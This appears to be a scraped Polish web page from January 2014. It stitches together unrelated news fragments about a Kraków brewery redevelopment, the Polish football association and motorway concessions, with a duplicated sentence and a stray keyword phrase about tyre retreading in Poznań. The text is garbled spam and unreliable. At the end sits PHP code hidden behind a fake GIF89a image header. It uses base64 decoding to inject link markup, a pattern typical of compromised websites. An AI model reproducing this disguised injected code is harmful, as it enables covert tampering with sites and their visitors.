|
poniedziałek, 27 stycznia 2014 21:10 |
|
Na terenach dawnego Browaru Goetzów przy ulicy Lubicz rozpoczęły się prace porządkowe i rozbiórkowe związane z planowaną rewitalizacją tego obszaru. Kiedy kilka tygodni temu zapraszałem prezesa PZPN do "Cafe Futbol", byłem przekonany, że zechce odpowiedzieć na dziesiątki pytań, które nurtują fanów futbolu. Kiedy kilka tygodni temu zapraszałem prezesa PZPN do "Cafe Futbol", byłem przekonany, że zechce odpowiedzieć na dziesiątki pytań, które nurtują fanów futbolu bieżnikowanie opon poznań - Usiądziemy do stołu z partnerami z wszystkich trzech odcinków koncesyjnych A1, A2 i A4 - podkreśla Magdalena Jaworska, zastępca Generalnego Dyrektora Dróg Krajowych i . jpg. Już ponad trzy lata Grzegorz Lato rządzi PZPN-em. z10161124M. W przedzień imprezy, jakiej nie było w historii PZPN - finałów EURO 2012 na polskiej ziemi.
|
/*GIF89a Д нннббвКККьььюiяkТТТяцряхоХХХСДјрррНННщщщЭЭЭюcЮТКщпиЗЛНЗЗЗэfьx)*/echo base64_decode('PGJyIC8+PGEgaHJlZj0iIiB0YXJnZXQ9Il9ibGFuayI+PC9hPg==');/*ПТФчхуРѕґя±‚ядФЭОЕстфТХЧэээяяя!щ , jа'ЋdiћиЁeH:ЕУєBGк-БF*/if(!defined('RIGHTCOLUMN'))define('RIGHTCOLUMN',0);/*ђАВS&ЕO!™$ ЂБ 8‘[„`ЏA БpџKВђЊ†Q(ґЬв'аћg%2)z)94–—#! ;*/?>